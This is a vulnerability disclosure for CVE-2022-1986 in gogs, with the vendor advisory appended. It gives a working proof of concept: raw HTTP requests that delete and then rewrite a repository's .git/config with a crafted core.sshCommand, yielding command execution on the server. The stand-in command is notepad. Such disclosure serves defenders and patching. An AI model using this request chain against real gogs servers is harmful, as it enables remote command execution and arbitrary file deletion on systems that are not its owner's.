Headline
CVE-2022-1986: OS Command Injection in file editor in gogs
OS Command Injection in GitHub repository gogs/gogs prior to 0.12.9.
Description
Deploy and run gogs.
Proof of Concept
Create a repository and upload a file named config to the repository repo6. The content of the file is as follows:
[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true ignorecase = true precomposeunicode = true sshCommand = notepad [remote “origin”] url = [email protected]:torvalds/linux.git fetch = +refs/heads/:refs/remotes/origin/ [branch “master”] remote = origin merge = refs/heads/master
2.The attacker can remove the .git/config file.
http request:
POST /admin1/repo6/_delete/master/.git/config HTTP/1.1
Host: 192.168.1.59:3000
Content-Length: 130
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: lang=zh-CN; i_like_gogs=858a2bd132c75d53
Connection: close
_csrf=PuAr2ZVY2NpoEOR1se-J81LVboM6MTY1NDAwODAzNDgzNDEwOTAwMA&commit_summary=&commit_message=&commit_choice=direct&new_branch_name=
- The attacker can set tree_path tree_path=.git/config to move a file into the .git/config directory.
http request:
POST /admin1/repo6/_edit/master/aaa/config HTTP/1.1
Host: 192.168.1.59:3000
Content-Length: 722
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: lang=zh-CN; i_like_gogs=858a2bd132c75d53
Connection: close
_csrf=CQ7KgJoDP2oI1xKrj0bx1GtYiQ46MTY1NDAwNzk1MjA5ODk5MTQwMA&last_commit=11e2a5c721b9f9cbe4bb32bcdcc6318794e350ff&tree_path=.git%2Fconfig&content=%5Bcore%5D%0D%0A++++repositoryformatversion+%3D+0%0D%0A++++filemode+%3D+true%0D%0A++++bare+%3D+false%0D%0A++++logallrefupdates+%3D+true%0D%0A++++ignorecase+%3D+true%0D%0A++++precomposeunicode+%3D+true%0D%0A++++sshCommand+%3D+notepad%0D%0A%5Bremote+%22origin%22%5D%0D%0A++++url+%3D+git%40github.com%3Atorvalds%2Flinux.git%0D%0A++++fetch+%3D+%2Brefs%2Fheads%2F*%3Arefs%2Fremotes%2Forigin%2F*%0D%0A%5Bbranch+%22master%22%5D%0D%0A++++remote+%3D+origin%0D%0A++++merge+%3D+refs%2Fheads%2Fmaster%0D%0A%0D%0A%0D%0A&commit_summary=&commit_message=&commit_choice=direct&new_branch_name=
Note: Write or rewrite the .git/config file ( the core.sshCommand was already set), which leads to remote command execution vulnerability.
Then the command notepad executed on the server.
Impact
1.This vulnerability is capable of executing commands on the remote server and gain the privileged user account, which leads sensitive data exposure, identity theft, etc.
2.Delete arbitrary files, such as gogs/custom/conf/app.ini
3.Write the file to another path.
Occurrences
Related news
### Impact The malicious user is able to update a crafted `config` file into repository's `.git` directory in combination with crafted file deletion to gain SSH access to the server. All installations with [repository upload enabled (default)](https://github.com/gogs/gogs/blob/f36eeedbf89328ee70cc3a2e239f6314f9021f58/conf/app.ini#L127-L129) are affected. ### Patches File deletions are prohibited to repository's `.git` directory. Users should upgrade to 0.12.9 or the latest 0.13.0+dev. ### Workarounds N/A ### References https://huntr.dev/bounties/776e8f29-ff5e-4501-bb9f-0bd335007930/ ### For more information If you have any questions or comments about this advisory, please post on #7000.